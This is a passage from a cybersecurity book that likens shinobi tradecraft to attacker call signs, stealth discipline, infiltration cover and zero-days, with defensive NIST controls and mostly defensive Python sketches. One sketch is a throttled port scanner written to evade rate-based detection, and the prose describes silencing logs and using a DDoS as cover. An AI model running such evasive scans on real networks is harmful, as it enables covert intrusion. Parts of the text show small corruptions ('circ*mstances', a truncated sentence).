these items, ordinary passersby would not notice a few oddly colored

grains of rice. Using similar methods, the shinobi could subtly point a

piece of broken bamboo to direct an ally toward a chosen footpath, or

they could leave a small piece of paper on the ground to identify a dwell-

ing that would be burned down, lessening the chance that team members

would find themselves either victims or suspects of arson.1

In this chapter, we will explore the ways that call sign techniques

could be used in networked environments and why cyber threat actors

might use them. We will hypothesize where in the network call signs

could be placed and what they might look like. In addition, we will dis-

cuss how one could hunt for these call signs in a target network. We will

review the challenge of detecting creative call signs and touch on the

crux of this challenge: controlling and monitoring your environment for

an adversary’s actions. You will get a chance, in the thought exercise, to

build up mental models and solutions to deal with the challenge of enemy

call signs. You will also be exposed to security controls that may prevent

threat actors from using call signs in your environment, as well as limit

their capabilities.

Operator Tradecraft

During the Democratic National Committee hack of 2016, the Russian

military agency GRU (also known as APT28 or FANCYBEAR) and its

allied security agency FSB (APT29 or COZYBEAR) were operating on

the same network and systems, but they failed to use call signs to com-

municate with each other. This oversight resulted in duplication of effort

and the creation of observables, anomalies, and other indicators of com-

promise in the victim’s network, likely contributing to the failure of both

operations.2 The lack of communication, which probably stemmed from

compartmentalization between the two intelligence organizations, gives

us a sense of what cyber espionage threat groups could learn from the

shinobi.


While the cybersecurity community has not yet observed overlap-

ping threat groups using covert markers, the DNC hack demonstrates the

need for such a protocol to exist. It’s reasonable to assume that the GRU

and FSB performed an after-action report of their DNC hack tradecraft

efforts, and they may already have decided to implement a call sign proto-

col in future operations where target overlap is a concern. If cyber espio-

nage organizations begin to work regularly in insulated but intersecting

formations, they will need a way to communicate various information,

including simply their presence on systems and networks and details

about their targets, when using normal communication channels is not

possible.

If these call signs did exist, what would they look like? Effective cyber

call signs would most likely:

• Change over time, as shinobi markers did

• Be implemented in tools and malware that cannot be captured and reverse engineered; humans using keyboards would be needed to identify them.

• Exist in a location that the overlapping espionage group would

surely find, such as the valuable and unique primary domain

controller (DC). Given the presence of file security monitors and

the operational reality that DCs do not restart very often, a threat

group might place the marker in the DC’s memory to maximize

its persistence and minimize its detectability.

It remains unclear what kind of strings or unique hex bytes could

function as markers; in what cache, temporary table, or memory location

markers could reside; and how another operator could easily discover

them. Note, however, that the cybersecurity industry has observed mul-

tiple malware families that leave specific files or registry keys as a signal

to future copies of the virus that the infection has already successfully

spread to a given machine (and thus that they need not attempt to infect

it again).3 Though this call sign functionality could not be implemented

as easily against dynamic human threat actors, defenders could create

files and registry keys that falsely signal infection, prompting malware to

move on innocuously.
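The defensive trick in that last sentence can be automated. The sketch below plants a harmless decoy marker that a fictional self-checking worm would read as “this host is already infected.” The filename is invented; in practice you would reproduce the exact file, registry key, or mutex that a specific malware family checks for.

import os
from pathlib import Path

# Hypothetical marker a fictional worm checks before infecting a host.
MARKER_DIR = Path(os.environ.get("PROGRAMDATA", "/var/tmp"))
MARKER = MARKER_DIR / ".wrm_installed"

def plant_vaccine():
    try:
        MARKER.touch(exist_ok=True)  # empty file; its presence is the signal
        print(f"planted decoy infection marker at {MARKER}")
    except PermissionError:
        print("insufficient privileges; rerun with administrative rights")

if __name__ == "__main__":
    plant_vaccine()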

Detecting the Presence of Call Signs

Many organizations struggle to identify which user deleted a file from a

shared network drive, let alone to detect covert call signs hidden inside

remote parts of a system. Nonetheless, defenders will increasingly need

to be able to defend against threats that communicate with each other inside the defender’s environment. To have a chance of catching threat

actors, defenders will need training, and they will need to implement

detection tools and have host visibility.

1. Implement advanced memory monitoring. Identify high-value sys-

tems in your network—systems that you believe a threat actor

would target or need to access to move onward to a target. Then,

explore the existing capabilities of your organization to monitor

and restrict memory changes on these systems. Look at products

and services offered by vendors as well. Evaluate the amount of

effort and time that would be necessary to investigate the source

of such memory changes. Finally, determine whether you could

confidently identify whether those changes indicated that the tar-

get machines had been compromised. (A minimal baselining sketch follows this list.)

2. Train your personnel. Train your security, hunt, and IT teams to

consider forensic artifacts in memory as potential indicators of

compromise, especially when these are found in high-value tar-

gets, rather than dismissing any incongruities they find.
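A crude but concrete starting point for item 1 is to baseline what a critical process has mapped into memory and to diff later snapshots against that baseline. The sketch below assumes the third-party psutil package and sufficient privileges; it sees only file-backed regions, so treat it as a first-pass tripwire, not full memory forensics.

import psutil  # third-party: pip install psutil

def module_baseline(pid):
    """Snapshot the file-backed regions mapped into a process."""
    return {m.path for m in psutil.Process(pid).memory_maps() if m.path}

def new_regions(pid, baseline):
    """Return regions that have appeared since the baseline was taken."""
    return module_baseline(pid) - baseline

# Hypothetical use against a high-value process on a domain controller:
# baseline = module_baseline(critical_pid)  # taken at a known-good time
# added = new_regions(critical_pid, baseline)
# if added:
#     alert(f"unexpected regions mapped into {critical_pid}: {added}")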

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. You receive reliable intelligence that teams of shinobi are targeting your castle and that they are using call signs to communicate with each other. Their covert signals include placing discreet markers on the ground, including dyed rice, flour, and broken bamboo.

How would you train your guards to be aware of these techniques—and of techniques you have not yet considered? How could you help them manage the false alerts likely to occur when your own people accidentally drop rice on the ground or when animals and wind disturb the environment? What architectural changes could you make to your castle and the grounds to more easily detect secret markers? What countermeasures would destroy, disrupt, or degrade the ability of these markers to communicate or deceive the shinobi who are sending and receiving the signals?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of call signs in mind.


1. Ensure that prior user information is unavailable to current

users who obtain access to the same system or resources. [SC-4:

Information in Shared Resources]

2. Identify system communications that could be used for unauthor-

ized information flows. A good example of a potential covert

channel comes from control “PE-8: Visitor Access Records.” Paper

log books or unrestricted digital devices that visitors use to sign

in to facilities could be vulnerable to information markers that

signal to compartmentalized espionage actors that other teams

have visited the location. [SC-31: Covert Channel Analysis]

3. Search for indicators of potential attacks and unauthorized

system use and deploy monitoring devices to track information

transactions of interest. [SI-4: System Monitoring]

4. Protect system memory from unauthorized changes. [SI-16:

Memory Protection]

Debrief

In this chapter, we reviewed the physical markers shinobi teams used to

signal to each other inside enemy territory. We learned why these call

signs were useful and the characteristics of good call signs according to

the scrolls. We then reviewed a cyber espionage operation where a lack

of call signs and the resulting poor coordination contributed to revealing

threat group activity. We discussed how modern threat groups will likely

continue to gain sophistication—a sophistication that may include adopt-

ing call sign techniques. We explored what modern digital call signs

could look like as well as how we might notice them.

In the following chapter, we will discuss the opposite of shinobi call

signs: precautions that shinobi took to leave no trace of their activity

inside enemy territory, as the scrolls instructed. Advanced techniques

included creating false signals intended to deceive the defender.

20

L I G H T, N O I S E , A N D

L I T T E R D I S C I P L I N E

The traditions of the ancient shinobi say you should lock the

doors before you have a look at the enemy with fire.

If you have to steal in as a shinobi when it is snowing, the first

thing you must be careful about is your footsteps.

—Yoshimori Hyakushu #53

Avoiding unwanted attention was a core discipline of the shinobi’s trade, and they trained diligently in stealth. If

lanterns emitted light that disturbed animals, footsteps

echoed and woke a sleeping target, or food waste alerted

a guard to the presence of an intruder, then a shinobi put

their mission—if not their life—in jeopardy. As such, the

scrolls provide substantial guidance around moving and

operating tactically while maintaining light, noise, and lit-

ter discipline.

Light discipline includes general tactics. For example, the scrolls

recommend that infiltrating shinobi lock a door from the inside before

igniting a torch to prevent the light (and any people in the room) from


escaping.1 It also includes specific techniques. Bansenshūkai details a num-

ber of clever tools for light management, such as the torinoko fire egg. This

is a bundle of special flammable material with an ember at the center,

compressed to the shape and size of an egg. The egg rests in the shinobi’s

palm such that opening or closing the hand controls the amount of oxy-

gen that reaches the ember, brightening or dimming the light and allow-

ing the carrier to direct the light in specific, narrow directions.2 With

this tool, a shinobi could quickly open their hand to see who was sleeping

inside a room, then instantly extinguish the light by making a tight fist.

Thus, the fire egg has the same on-demand directional and on/off light

control as a modern tactical flashlight.

Silence was critical for shinobi, and the scrolls describe an array of

techniques to remain quiet while infiltrating a target. The Ninpiden sug-

gests biting down on a strip of paper to dampen the sound of breathing.

Similarly, some shinobi moved through close quarters by grabbing the

soles of their feet with the palms of their hands, then walking on their

hands to mute the sound of footsteps. This technique must have required

considerable practice and conditioning to execute successfully. It was also

common for shinobi to carry oil or other viscous substances to grease

creaky gate hinges or wooden sliding doors—anything that might squeak

and alert people to their presence. The scrolls also warn against applying

these liquids too liberally, as they could visibly pool, tipping off a guard to

the fact that someone had trespassed.3

Not all shinobi noise discipline techniques minimized noise. The

scrolls also provide guidance for creating a purposeful ruckus. Shōninki

describes a noise discipline technique called kutsukae, or “changing your

footwear,” which actually involves varying your footsteps rather than put-

ting on different shoes. An infiltrating shinobi can shuffle, skip, fake

a limp, take choppy steps, or make audible but distinct footstep noises

to deceive anyone listening. Then, when they change to their natural

gait, listeners assume they’re hearing a different person or erroneously

believe that the person they’re tracking suddenly stopped.4 The Ninpiden

describes clapping wooden blocks together or yelling “Thief!” or “Help!”

to simulate an alarm, testing the guards’ reaction to noise.5 Bansenshūkai

describes a more controlled noise test, in which a shinobi near a target or

guard whispers progressively more loudly to determine the target’s noise

detection threshold. Noise tests help shinobi make specific observations

about how the target responds, including:

• How quickly did the target react?

• Was there debate between guards about hearing a noise?

• Did guards emerge quickly and alertly, with weapons in hand?


• Did the noise seem to catch the target off guard?

• Was the target completely oblivious?

These observations not only tell the shinobi how keen the target’s

awareness and hearing are but also reveal the target’s skill and prepara-

tion in responding to events—information the shinobi can use to tailor

the infiltration.6

In terms of physical evidence, shinobi used “leave no trace” long

before it was an environmental mantra. A tool called nagabukuro (or “long

bag”) helps with both sound and litter containment. When shinobi scaled

a high wall and needed to cut a hole to crawl through, they hung the

large, thick, leather nagabukuro bag lined with fur or felt beneath them

to catch debris falling from the wall and muffle the sound. The shinobi

could then lower the scraps quietly to a discreet place on the ground

below. This was much better option than letting debris crash to the

ground or splash into a moat.7

In this chapter, we abstract the light, noise, and litter of shinobi infil-

trators into their cyber threat equivalents. We will review some tools and

techniques that threat groups have used to minimize the evidence they

leave behind, as well as some procedural tradecraft disciplines. We’ll dis-

cuss the topic of detecting “low and slow” threats, along with modifying

your environment so it works to your advantage. The thought exercise will

look at a technique used by shinobi to mask their footsteps that could in

theory be applied to modern digital systems. At the end of the chapter,

we’ll cover detection discipline as a way to counter a sophisticated adver-

sary—one who is mindful of the observables they may leave (or not leave)

in your network.

Cyber Light, Noise, and Litter


The digital world does not always behave in the same ways as the physical

world. It can be challenging to understand and continuously hunt for the

cyber equivalents of light, noise, and litter. Because defenders lack the

time, resources, and capability to monitor and hunt within digital systems

under their control, an adversary’s light, noise, and/or litter trail too

often goes undocumented. As a result, threat actors may have an easier

time performing cyber infiltration than physical infiltration.

Many scanning and exploitation tools and frameworks, such as Nmap,8

have throttling modes or other “low-and-slow” methods that attempt to

exercise discipline on the size of packets or payloads, packet frequency,

and bandwidth usage on a target network. Adversaries have developed

extremely small malicious files (for instance, the China Chopper can be


less than 4KB9) that exploit defenders’ assumption that a file with such a

slight footprint won’t cause harm. Malware can be configured to minimize

the amount of noise it makes by beaconing command and control (C2)

posts infrequently, or it can minimize the noise in process logs or memory

by purposefully going to sleep or executing a no-operation (NOP) for long

periods. To avoid leaving digital litter that could reveal its presence, certain

malware does not drop any files to disk. Adversaries and malware on neigh-

boring network infrastructure can choose to passively collect information,

leading to a slow but fruitful understanding of the environment inside

the target. Notably, many of these threats also choose to accept the risk of

cyber light, noise, and/or litter that results from running their campaigns.
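To make “low and slow” concrete, here is a toy Python version of a throttled scan; mature tools such as Nmap offer far more capable timing controls. The target below is a reserved documentation address standing in for a lab host.

import random
import socket
import time

TARGET = "192.0.2.10"        # reserved TEST-NET address; a placeholder
PORTS = [22, 80, 443, 3389]  # a handful of interesting ports

# One probe every few minutes, in random order, to stay under
# rate-based detection thresholds.
random.shuffle(PORTS)
for port in PORTS:
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.settimeout(3)
    result = probe.connect_ex((TARGET, port))  # 0 means the port answered
    probe.close()
    print(f"port {port}: {'open' if result == 0 else 'closed or filtered'}")
    time.sleep(random.uniform(180, 420))       # minutes between probes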

It is reasonable to assume that sufficiently advanced adversaries have

procedures to limit cyber light, noise, and litter, such as:

• Limiting communication with a target to less than 100MB

per day

• Ensuring that malware artifacts, files, and strings are not eas-

ily identified as litter that could reveal their own presence or be

attributed to the malware

• “Silencing” logs, alerts, tripwires, and other sensors so security is

not alerted to the intruder's presence

It seems that most current security devices and systems are designed

to trigger in response to the exact signature of a known threat, such as a

specific IP, event log, or byte pattern. Even with specialized software that

shows analysts threat activity in real time, such as Wireshark,10 it takes

significant effort to collect, process, and study this information. Contrast

this workflow with that of hearing footsteps and reacting. Because

humans cannot perceive the digital realm with our senses in the same

way that we perceive the physical environment, security measures are basi-

cally guards with visual and hearing impairments waiting for a prompt to

take action against a threat across the room.

Detection Discipline

Unfortunately, there is no ideal solution for catching someone skilled

in the ways of not being caught. Some threat actors have such an advan-

tage over defenders in this realm that they can gain unauthorized access

to the security team’s incident ticket tool and monitor it for any new

investigations that reference their own threat activity. However, there

are improvements to be made, training to be had, countermeasures to

deploy, and tricks defenders can try to trip up or catch the threat in a tra-

decraft error.


1. Practice awareness. As part of training for threat hunting, incident

response, and security analysis, teach your security team to look

for indications of an adversary’s light, noise, or litter.

2. Install squeaky gates. Consider implementing deceptive attack sens-

ing and warning (AS&W) indicators, such as security events that

go off every minute on domain controllers or other sensitive sys-

tems or networking devices. For example, you might implement a

warning that says “[Security Event Log Alert]: Windows failed to

activate Windows Defender/Verify this version of Windows.” This

may deceive an infiltrating adversary into thinking you’re not pay-

ing attention to your alerts, prompting the adversary to “turn off”

or “redirect” security logs away from your sensors or analysts. The

sudden absence of the false alert will inform your defenders of the

adversary’s presence (or, in the case of a legitimate crash, of the

need to reboot the system or have IT investigate the outage). A watchdog sketch for this idea follows the list.

3. Break out the wooden clappers. Consider how an advanced adversary

could purposefully trigger alerts or cause noticeable network

noise from a protected or hidden location in your environment

(that is, attacking known honeypots) to observe your security

team’s ability to detect and respond. This is the cyber equivalent

of a ninja running through your house at night slamming two

pieces of wood together to test your response. It’s reasonable to

assume that some adversaries may assess your security in this way

so they can determine whether they can use zero days or other

covert techniques without fear of discovery.
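A minimal watchdog for the squeaky-gate idea in item 2 might look like the following sketch. It assumes the decoy alert writer touches a file on every emission; the path and timings are invented, and a production version would read from your SIEM instead of the filesystem.

import time
from pathlib import Path

DECOY_LOG = Path("/var/log/decoy_heartbeat.log")  # hypothetical path
INTERVAL = 60  # the decoy alert is expected once a minute
GRACE = 30     # tolerate modest delays before raising the alarm

if not DECOY_LOG.exists():
    raise SystemExit("no decoy log found; is the decoy emitter running?")

def seconds_since_last_heartbeat():
    # The decoy writer updates this file each time it emits the fake alert.
    return time.time() - DECOY_LOG.stat().st_mtime

while True:
    if seconds_since_last_heartbeat() > INTERVAL + GRACE:
        print("decoy alert went silent: suspect log redirection or a crash")
        break
    time.sleep(10)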

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. As it is not feasible to have eyes everywhere, you have positioned your guards where they can listen for odd sounds in key egress pathways. You have also trained your guards to notice anomalous noises. You are told that shinobi have specially made sandals with soft, fabric-stuffed soles so they can walk on tile or stone without making noise.

How could you use this information to detect a ninja in your castle? What evidence might these special sandals leave behind? What countermeasures could you deploy to mitigate the threat these sandals pose? How would you train your guards to react when they see a person in the castle walking suspiciously quietly?


Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated in

terms of the light, noise, and litter that might accompany an attack.

1. Determine your organization’s detection capabilities by simulat-

ing network infiltration by both loud-and-fast and low-and-slow

adversaries. Document which logs are associated with which

observable activity and where you may have sensory dead spots.

[AU-2: Audit Events; CA-8: Penetration Testing; SC-42: Sensor

Capability and Data]

2. Correlate incident logs, alerts, and observables with documented

threat actions to better educate your staff and test your percep-

tion of how threats will “sound” on the network. [IR-4: Incident

Handling | (4) Information Correlation]

3. Tune your sandboxes and detonation chambers to look for

indicators of a threat actor who is attempting to exercise the

cyber equivalent of light, noise, and litter discipline. [SC-44:

Detonation Chambers]

4. Use non-signature-based detection methods to look for covert dis-

ciplined activity designed to avoid signature identification. [SI-3:

Malicious Code Protection | (7) Nonsignature-Based Detection]

5. Deploy information system monitoring to detect stealth activity.

Avoid placing oversensitive sensors in high-activity areas. [SI-4:

Information System Monitoring]

Debrief

In this chapter, we reviewed the precautions shinobi took and the tools

they used to hide evidence of their activity—for example, measuring how

much noise they could make before alerting the guards and learning

what the target was likely to do if shinobi activity were discovered. We dis-

cussed several cyber tools that adversaries have used and how they might

be understood as the equivalent of light and noise—evidence that can

be detected by defenders. Lastly, we reviewed potential countermeasures

that defenders can take.

In the next chapter, we will discuss circ*mstances that assist shinobi

in infiltration because they mitigate the problems of light, noise, and lit-

ter. For example, a strong rainstorm would mask noise, obscure visibility,

and clear away evidence of their presence. A cyber defender can consider

analogous circ*mstances to protect their systems.

21

C I R C U M S T A N C E S O F

I N F I L T R A T I O N

You should infiltrate at the exact moment that the enemy moves and not

try when they do not move—this is a way of principled people.

In heavy rainfall, when the rain is at its most, you should take

advantage of it for your shinobi activities and night attacks.

—Yoshimori Hyakushu #1

The Ninpiden and Bansenshūkai both advise that when

moving against a target, shinobi should use cover to go

undetected. They may wait for circ*mstances in which

cover exists or, if necessary, create those circ*mstances

themselves. The scrolls provide a wide range of situations

that can aid infiltration, from natural occurrences (strong

winds and rain) to social gatherings (festivals, weddings,

and religious services) to shinobi-initiated activity (releas-

ing horses, causing fights, and setting fire to buildings).1

Regardless of their source, a canny shinobi should be able

to capitalize on distractions, excitement, confusion, and

other conditions that divert the target’s focus.


Shinobi were able to turn inclement weather into favorable infiltra-

tion circ*mstances. For instance, heavy rainstorms meant empty streets,

poor visibility, and torrents to muffle any sounds the shinobi made.2 Of

course, bad weather is bad for everyone, and the second poem of the

Yoshimori Hyakushu notes that too strong a storm can overpower a shinobi,

making it difficult to execute tactics and techniques: “In the dead of

night, when the wind and rain are raging, the streets are so dark that shi-

nobi cannot deliver a night attack easily.”3

Shinobi also capitalized on other, more personal circ*mstances, such

as a tragic death in the target’s family. The scrolls point out that while

a target is in mourning, they may not sleep well for two or three nights,

meaning the shinobi may approach unnoticed during the funeral or

bereavement disguised as a mourner, or wait to infiltrate until the target

finally sleeps deeply on night three or four.4

Of course, a shinobi’s mission did not always coincide with provi-

dence. In some cases, shinobi took it upon themselves to cause severe ill-

ness at the target fortification. Sick people were ineffective defenders, and

their worried caregivers were preoccupied and denied themselves sleep to

tend to the ill. When the afflicted began to recover, the relieved caregiv-

ers slept heavily, at which point shinobi infiltrated. Alternatively, shinobi

could destroy critical infrastructure, such as a bridge, and then wait for

the target to undertake the large and difficult reconstruction project in

the summer heat before infiltrating an exhausted opponent.5

Effective distractions could also be more directly confrontational.

Bansenshūkai describes a technique called kyonin (“creating a gap by sur-

prise”) that employs the assistance of military forces or other shinobi.

These allies make the target think an attack is underway, perhaps by

firing shots, beating war drums, or shouting, and the shinobi can slip in

during the confusion. When the shinobi wanted to exit safely, this tech-

nique was simply repeated.6

In this chapter, we will review how the use of situational factors to aid infiltration, as described in the shinobi scrolls, applies to the digital era.

The use of situational factors depends on defenders, security systems,

and organizations having finite amounts of attention. Overloading, con-

fusing, and misdirecting that limited attention creates opportunities a

threat actor can exploit. We will identify various opportunities that can

be found in modern networked environments and explain how they par-

allel the circ*mstances described in the shinobi scrolls. Finally, we will

review how organizations can incorporate safeguards and resiliency to

prepare for circ*mstances that may weaken their defenses.


Adversarial Opportunity

Cybersecurity adversaries may distract their targets and create conditions that mask infiltration as widely—and wisely—as shinobi once did.

uted denial of service (DDoS) attack, standard operating procedures

require evaluating the strength and duration of the DDoS and creating

a security incident ticket to log the activity. Defenders may not immedi-

ately suspect a DDoS as cover for a threat actor’s attack on the network.

So when the attack overwhelms the target’s security sensors and packet

capture (pcap) and intrusion detection or prevention systems (IDS/IPS)

fail to open—in other words, when there is too much communication

to inspect—defensive systems might naturally rush the packet along

without searching it for malicious content. When the DDoS ceases, the

defenders will note that there was no significant downtime and return

their status to normal, not realizing that, while the DDoS lasted only 10

minutes, the packet flood gave the adversary enough time and cover to

compromise the system and establish a foothold in the network. (As in

Yoshimori Hyakushu 2, which warned that a strong storm could hinder

both target and attacker, the adversary is unlikely to deploy an overly

intense DDoS. Doing so could cause networking gear to drop packets

and lose communication data—including their own attacks. Instead, an

attacker will likely throttle target systems to overwhelm security without

disrupting communication.)
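One retrospective check is cheap: once the DDoS window is known, pull every session your boundary devices saw start during it. The sketch below does this over invented records; in practice, the incident ticket supplies the window and the firewall or proxy supplies the sessions.

from datetime import datetime, timedelta

# Hypothetical incident window taken from the DDoS ticket.
ddos_start = datetime(2021, 3, 4, 14, 2)
ddos_end = ddos_start + timedelta(minutes=10)

# Hypothetical firewall log: (time, internal host, destination).
sessions = [
    (datetime(2021, 3, 4, 13, 55), "web-01", "cdn.example.net"),
    (datetime(2021, 3, 4, 14, 7), "web-01", "203.0.113.77"),
]

for started, host, destination in sessions:
    if ddos_start <= started <= ddos_end:
        print(f"review: {host} reached {destination} during the DDoS window")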

Adversaries have many other ways to create favorable circ*mstances

in the infiltration target; they are limited only by their ingenuity. It could

be advantageous to attack service and infrastructure quality and reli-

ability, such as by disrupting ISPs or interconnections. Patient attackers

could wait for commercial vendors to release faulty updates or patches,

after which the target’s security or IT staff temporarily creates “permit

any-any” conditions or removes security controls to troubleshoot the

problem. Threat actors might monitor a company’s asset acquisition

process to determine when it moves new systems and servers to produc-

tion or the cloud—and, hence, when these targets might be temporarily

unguarded or not properly configured against attacks. Threat actors

might also track a corporate merger and attempt to infiltrate gaps cre-

ated when the different companies combine networks. Other adversaries

might use special events hosted in the target’s building, such as large

conferences, vendor expos, and third-party meetings, to mingle in the

crowd of strangers and infiltrate the target. They might even pick up a

swag bag in the process.


Adversarial Adversity

It is considered infeasible to guarantee 100 percent uptime of digital

systems, and it should be considered even harder to guarantee 100 per-

cent assurance of security at all times for those same digital systems.

Furthermore, it is almost certainly impossible to prevent disasters, haz-

ards, accidents, failures, and unforeseen changes—many of which will

create circ*mstances in which opportunistic threat actors can infiltrate.

Being overly cautious to avoid these circ*mstances can hamper a busi-

ness’s ability to be bold in strategy and execute on goals. A solution to

this dilemma may be to redundantly layer systems to reduce infiltra-

tion opportunities. Security teams might put in place the equivalent of

high-availability security—security that is layered redundantly where

systems are weaker. Practice awareness and preparation. As part of security

staff protocols for change management, events, incidents, crises, natural

disasters, and other distracting or confusing circ*mstances, train your

security team to look for indications that an event was created or is being

used by adversaries to infiltrate the organization. Document role respon-

sibilities in organizational policies and procedures. Use threat modeling,

tabletop exercises, and risk management to identify potential distrac-

tions, then consider safeguards, countermeasures, and protections for

handling them.

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. You have noticed that during especially cold and windy ice storms, your gate guards hunker down in their posts, cover their faces, and keep themselves warm with small, unauthorized fires—fires that reduce their night vision and make their silhouettes visible.

How might a shinobi take advantage of extreme conditions, such as a blizzard or ice storm, to infiltrate your castle? How would they dress? How would they approach? How freely could they operate with respect to your guards? What physical access restrictions and security protocols could your guards apply during a blizzard? Could you change the guard posts so your soldiers could effectively watch for activity during such conditions? Besides weather events, what other distracting circ*mstances can you imagine, and how would you handle them?


Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. They should be evaluated with

the concept of circ*mstances of infiltration in mind.

1. Identify and document how different security controls and

protocols—for example, authentication—might be handled

during emergencies or other extreme circ*mstances to miti-

gate adversary infiltration. [AC-14: Permitted Actions Without

Identification or Authentication]

2. Establish controls and policies around the conditions for using

external information systems, particularly during extenuating

circ*mstances. [AC-20: Use of External Information Systems]

3. Launch penetration testing exercises during contingency train-

ing for simulated emergencies, such as fire drills, to test defensive

and detection capabilities. [CA-8: Penetration Testing; CP-3:

Contingency Training; IR-2: Incident Response Training]

4. Enforce physical access restrictions for visitors, as well as for cir-

c*mstances in which it is not possible to escort a large number of

uncontrolled persons—for example, firefighters responding to

a fire—but unauthorized system ingress and egress must still be

prevented. [PE-3: Physical Access Control]

5. Develop a capability to shut off information systems and networks

in the event of an emergency, when it is suspected that an adver-

sary has compromised your defenses. [PE-10: Emergency Shutoff]

6. Consider how your organization can incorporate adversary

awareness and hunting into contingency planning. [CP-2:

Contingency Plan]

7. Evaluate whether a sudden transfer or resumption of business

operations at fallback sites will create opportune circ*mstances

for adversary infiltration. Then consider appropriate defensive

safeguards and mitigations. [CP-7: Alternate Processing Site]

Debrief

In this chapter, we reviewed the tactic of creating and/or waiting for cir-

c*mstances that provide cover for infiltrating a target. We looked at sev-

eral examples of how shinobi would create an opportunity when a target

was well defended, and we explored how this tactic could play out in mod-

ern networked environments. We covered various methods for managing


security during times of weakness, and through the thought exercise,

we looked at preparing for circ*mstances where risk cannot be avoided,

transferred, or countered.

In the next chapter, we will discuss the zero-day, or a means of infil-

tration so novel or secret that no one has yet thought about how to defend

against it. Shinobi had exploits and techniques similar to zero-days; they

were so secret, it was forbidden to write them down, and the scrolls only

allude to them indirectly. We are left only with cryptic clues—clues pro-

vided to remind a shinobi of a secret technique they had learned, but not

to teach it. Even so, the scrolls provide insight around how to create new

zero-days, procedures to defend against them, and tradecraft in execut-

ing them. Furthermore, the scrolls describe several historical zero-day

techniques that had been lost due to their disclosure, giving us insight

into modern zero-day exploits and a potential forecast of zero-days of

the future.

22

Z E R O - D A Y S

A secret will work if it is kept; you will lose if words are given away.

You should be aware that you shouldn’t use any of the ancient ways

that are known to people because you will lose the edge of surprise.

—Shōninki, “Takaki wo Koe Hikuki ni Hairu no Narai” 1

One of the shinobi’s key tactical advantages was secrecy.

The scrolls repeatedly warn shinobi to prevent others from

learning the details of their capabilities, since if knowledge

of a technique leaked to the public, the consequences

could be disastrous. Not only could the techniques be

invalidated for generations, but the lives of shinobi using

a leaked technique could be in danger. Both Shōninki and

the Ninpiden describe the hazards of exposing secret ninja

tradecraft to outsiders, with some scrolls going so far as

to advise killing targets who discover tradecraft secrets or

bystanders who observe a shinobi in action.2

Both Shōninki and the Ninpiden cite ancient techniques that were

spoiled due to public exposure. For instance, when ancient ninjas (yato)3

conducted reconnaissance, they sometimes traveled across farm fields;


they avoided detection by, among other means, dressing like a scarecrow

and snapping into a convincing pose when people approached.4 Once

this technique was discovered, however, locals regularly tested scarecrows

by rushing them or even stabbing them. No matter how convincing the

shinobi’s disguise or how skillful their pantomime, the technique became

too risky, and shinobi had to either develop new ways to hide in plain

sight or avoid fields altogether. The skill was lost.

Similarly, some shinobi became master imitators of cat and dog

sounds, so that if they accidentally alerted people to their presence dur-

ing a mission, they could bark or mew to convince the target that the

disturbance was just a passing animal and there was no need for further

inspection. This technique was also discovered eventually. Guards were

trained to investigate unfamiliar animal noises, putting shinobi at risk of

discovery.5

The scrolls also describe situations in which a fortification was pro-

tected by dogs that shinobi could not kill, kidnap, or befriend without

rousing suspicion from security guards. In this situation, the scrolls tell

shinobi to wear the scent of whale oil and then either wait for the dog to

stray away from the guards or lure the dog away. They then beat the dog,

and they do this several nights in a row. With its pungency and rarity, the

scent of whale oil conditions the dog to associate pain and punishment

with the odor, and the dog is then too afraid to attack shinobi wearing

the distinctive scent. When this technique was disclosed, guards were

trained to notice the unique scent of whale oil or when their dog’s behav-

ior suddenly changed.6

Of course, most shinobi secrets went unexposed until the formal pub-

lication of the scrolls many years after the shinobi were effectively a his-

torical relic. Therefore, defenders of the era had to create techniques to

thwart attacks of which they had no details—potentially even attacks that

the attackers themselves had not yet considered.

For shinobi acting as defenders, the scrolls offer some baseline

advice. Bansenshūkai’s “Guideline for Commanders”7 volumes recommend

various security best practices, including passwords, certification stamps,

identifying marks, and secret signs and signals. The scroll also advises

commanders to contemplate the reasoning behind these security strata-

gems; pair them with other standard protocols, such as night watches and

guards; take advanced precautions, such as setting traps; and develop

their own secret, custom, dynamic security implementations. Together,

these techniques defended against attackers of low or moderate skill but

not against the most sophisticated shinobi.8

To that end, Bansenshūkai’s most pragmatic security advice is that

defenders will never be perfectly secure, constantly alert, or impeccably


disciplined. There will always be gaps that shinobi can exploit. Instead,

the scroll emphasizes the importance of understanding the philosophy,

mindset, and thought processes of one’s enemies, and it implores shinobi

to be open to trying new techniques, sometimes on the fly: “It is hard to

tell exactly how to act according to the situation and the time and the

place. If you have a set of fixed ways or use a constant form, how could

even the greatest general obtain a victory?”9

Shinobi defenders used creative mental modeling, such as by imagin-

ing reversed scenarios and exploring potential gaps. They drew inspira-

tion from nature, imagining how a fish, bird, or monkey would infiltrate

a castle and how they could mimic the animal’s abilities.10 They derived

new techniques by studying common thieves (nusubito). Above all, they

trusted the creativity of the human mind and exercised continuous learn-

ing, logical analysis, problem solving, and metacognitive flexibility:

Although there are millions of lessons for the shinobi, that

are both subtle and ever changing, you can’t teach them in

their entirety by tradition or passing them on. One of the most

important things for you to do is always try to know everything

you can of every place or province that is possible to know. . . .

If your mind is in total accordance with the way of things and

it is working with perfect reason and logic, then you can pass

through “the gateless gate.” . . . The human mind is marvelous

and flexible. It’s amazing. As time goes by, clearly or mysteri-

ously, you will realize the essence of things and understanding

will appear to you from nowhere. . . . On [the path of the shi-

nobi] you should master everything and all that you can . . . you

should use your imagination and insight to realize and grasp

the way of all matters. 11

A forward-thinking shinobi with a keen mind and a diligent work

ethic could build defenses strong enough to withstand unknown attacks,

forcing enemies to spend time and resources developing new attack

plans, testing for security gaps, and battling hidden defenses—only to

be thwarted once again when the whole security system dynamically

changed.

In this chapter, we will explore the modern threat landscape of zero-

days and understand what of the philosophy and tradecraft described

in the shinobi scrolls we can apply to cybersecurity. In addition, we will

explore various proposed defenses against zero-days. The castle thought

exercise in this chapter presents the challenge of addressing unknown

